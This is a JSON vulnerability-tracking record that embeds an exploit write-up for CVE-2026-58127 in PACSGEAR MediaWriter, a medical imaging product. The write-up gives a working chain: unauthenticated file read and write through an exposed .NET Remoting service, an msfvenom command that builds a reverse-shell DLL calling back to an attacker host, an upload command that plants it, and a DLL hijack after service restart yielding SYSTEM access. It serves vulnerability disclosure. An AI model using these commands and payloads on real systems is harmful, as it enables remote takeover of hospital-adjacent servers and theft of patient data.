{"vulnerability": "CVE-2026-58127", "sightings": [{"uuid": "5a874b21-1a6e-4ece-aa9a-253b0f59c9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58127", "type": "seen", "source": "https://gist.github.com/VAMorales/dc679ecab30b7045fa07bf3249a034d8", "content": "# 1. Exploit Title: PACSGEAR MediaWriter - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58127](https://www.cve.org/cverecord?id=CVE-2026-58127)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGear MediaWriter exposes on all interfaces a .NET Remoting service on port 9000 registered by the DLL file PacsgearMediaServerEngine.dll. The RegisterWellKnownServiceType function is used to register the .NET Remoting TCP channel for the service configured. The registered ObjectURI are RemoteObj and UIRemoteObj. By modifying the Proof of Concept of an object unmarshalling technique discovered by researchers of Code-White, implementing the .NET WebClient class method to read/write internal files and using a custom channel sink to force the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. This exploitation only requires the knowledge of a valid ObjectURI, which is default across all instances and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PacsgearMediaWriterService.exe, running as NT Authority\\SYSTEM, attempts to load multiple missing dynamic-link libraries file system paths (e.g. 
CRYPTSP.DLL, CRYPTBASE.DLL) when started, resulting in DLL hijacking opportunities when combined with the .NET Remoting AFR primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO.exe tcp://:9000/RemoteObj C:\\Windows\\win.ini`\n`.\\RemotingClient_MBRO.exe tcp://:9000/UIRemoteObj C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nMetasploit was used to generate a malicious DLL to achieve remote code execution.\n\n`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.179.130 LPORT=8443 -f dll -o cryptbase.dll`\n\nArbitrary file write is performed to upload the malicious dynamic-link library. The files were transferred to the remote server at `C:\\Program Files (x86)\\Pacsgear\\MediaWriter\\Service\\cryptbase.dll`.\n\n`.\\RemoteClient_MBRO.exe --put tcp://192.168.179.137:9000/RemoteObj .\\cryptbase.dll \"C:\\Program Files (x86)\\PACSGEAR\\MediaWriter\\Service\\cryptbase.dll\"`\n\nExploitation requires a restart of the affected service. Based on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. 
These tasks cannot be performed by a low-privileged user.\n\nAfter restarting the PacsgearMediaWriterService.exe service, which attempts to load the dynamic-link library cryptbase.dll, the malicious cryptbase.dll is triggered, causing the remote host to connect to an attacker-controlled server and achieve RCE as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T12:36:40.782427Z"}]}